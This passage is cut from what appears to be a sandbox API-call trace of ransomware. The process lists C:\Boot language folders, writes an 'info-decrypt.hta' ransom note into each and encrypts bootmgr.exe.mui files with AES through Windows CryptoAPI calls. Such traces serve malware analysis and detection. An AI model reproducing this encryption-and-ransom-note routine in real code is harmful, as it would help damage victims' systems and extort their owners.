(dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0143.958] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0143.959] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0143.959] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f010 [0143.959] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.959] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0143.959] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0143.960] FindClose (in: hFindFile=0xb7f010 | out: hFindFile=0xb7f010) returned 1 [0143.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0143.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0143.960] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0143.960] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0143.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0143.960] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta" (normalized: "c:\\boot\\cs-cz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0143.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0143.960] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0143.960] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0143.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0143.960] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\info-decrypt.hta" (normalized: "c:\\boot\\cs-cz\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4dc [0143.961] GetFileType (hFile=0x4dc) returned 0x1 [0143.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0143.961] GetFileType (hFile=0x4dc) returned 0x1 [0143.961] WriteFile (in: hFile=0x4dc, lpBuffer=0x35befec*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x35befec*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0143.962] WriteFile (in: hFile=0x4dc, lpBuffer=0x35befec*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x35befec*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0143.962] CloseHandle (hObject=0x4dc) returned 1 [0143.962] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0143.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0143.962] GetFileAttributesExW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x35c0008 | out: lpFileInformation=0x35c0008*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0143.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0143.962] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0143.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0143.963] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0143.963] GetFileType (hFile=0x4dc) returned 0x1 [0143.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0143.963] GetFileType (hFile=0x4dc) returned 0x1 [0143.963] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15c50 [0143.963] ReadFile (in: hFile=0x4dc, lpBuffer=0x454fe60, nNumberOfBytesToRead=0x15c50, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x454fe60*, lpNumberOfBytesRead=0x6a7f1bc*=0x15c50, lpOverlapped=0x0) returned 1 [0143.966] CloseHandle (hObject=0x4dc) returned 1 [0143.966] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe0690) returned 1 [0143.967] CryptGenRandom (in: hProv=0xbe0690, dwLen=0x10, pbBuffer=0x35c284c | out: pbBuffer=0x35c284c) returned 1 [0145.350] CryptImportKey (in: hProv=0xbe0690, pbData=0x37c3af0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f250) returned 1 [0145.351] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.351] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.351] CryptDuplicateKey (in: hKey=0xb7f250, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f490) returned 1 [0145.351] CryptContextAddRef (hProv=0xbe0690, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.351] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x37c3bd0*=0x1, dwFlags=0x0) returned 1 [0145.351] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x37c3b9c, dwFlags=0x0) returned 1 [0145.351] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4598778*, pdwDataLen=0x6a7f188*=0x15c60, dwBufLen=0x15c60 | out: pbData=0x4598778*, pdwDataLen=0x6a7f188*=0x15c60) returned 1 [0145.352] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c3bf8*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x37c3bf8*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0145.353] CryptDestroyKey (hKey=0xb7f250) returned 1 [0145.353] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0145.353] CryptReleaseContext (hProv=0xbe0690, dwFlags=0x0) returned 1 [0145.353] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0145.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0145.353] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0145.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0145.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0145.355] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0145.355] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0145.355] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f250 [0145.356] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.356] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0145.356] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0145.357] FindClose (in: hFindFile=0xb7f250 | out: hFindFile=0xb7f250) returned 1 [0145.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0145.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0145.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0145.357] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0145.357] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0145.357] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f250 [0145.357] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0145.357] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0145.358] FindNextFileW (in: hFindFile=0xb7f250, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0145.358] FindClose (in: hFindFile=0xb7f250 | out: hFindFile=0xb7f250) returned 1 [0145.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0145.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0145.358] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0145.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0145.358] GetFileAttributesExW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta" (normalized: "c:\\boot\\da-dk\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0145.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0145.358] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0145.358] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0145.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0145.358] CreateFileW (lpFileName="C:\\Boot\\da-DK\\info-decrypt.hta" (normalized: "c:\\boot\\da-dk\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x50c [0145.359] GetFileType (hFile=0x50c) returned 0x1 [0145.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0145.359] GetFileType (hFile=0x50c) returned 0x1 [0145.359] WriteFile (in: hFile=0x50c, lpBuffer=0x37c6a70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x37c6a70*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0145.360] WriteFile (in: hFile=0x50c, lpBuffer=0x37c6a70*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x37c6a70*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0145.360] CloseHandle (hObject=0x50c) returned 1 [0145.360] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0145.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0145.361] GetFileAttributesExW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x37c7a8c | out: lpFileInformation=0x37c7a8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0145.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0145.361] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0145.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0145.361] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0145.361] GetFileType (hFile=0x50c) returned 0x1 [0145.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0145.361] GetFileType (hFile=0x50c) returned 0x1 [0145.361] GetFileSize (in: hFile=0x50c, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15640 [0145.361] ReadFile (in: hFile=0x50c, lpBuffer=0x45ae3f8, nNumberOfBytesToRead=0x15640, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x45ae3f8*, lpNumberOfBytesRead=0x6a7f1bc*=0x15640, lpOverlapped=0x0) returned 1 [0145.364] CloseHandle (hObject=0x50c) returned 1 [0145.364] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1ebf8) returned 1 [0145.377] CryptGenRandom (in: hProv=0xb1ebf8, dwLen=0x10, pbBuffer=0x37c7f4c | out: pbBuffer=0x37c7f4c) returned 1 [0147.122] CryptImportKey (in: hProv=0xb1ebf8, pbData=0x37c4d6c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f510) returned 1 [0147.122] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.123] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.123] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f190) returned 1 [0147.123] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.123] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x37c4e4c*=0x1, dwFlags=0x0) returned 1 [0147.123] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x37c4e18, dwFlags=0x0) returned 1 [0147.123] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x45c3a58*, pdwDataLen=0x6a7f188*=0x15650, dwBufLen=0x15650 | out: pbData=0x45c3a58*, pdwDataLen=0x6a7f188*=0x15650) returned 1 [0147.124] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c4e74*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x37c4e74*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0147.125] CryptDestroyKey (hKey=0xb7f510) returned 1 [0147.125] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0147.125] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0147.405] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0147.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0147.405] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0147.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0147.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0147.407] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0147.407] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0147.407] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f890 [0147.408] FindNextFileW (in: hFindFile=0xb7f890, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 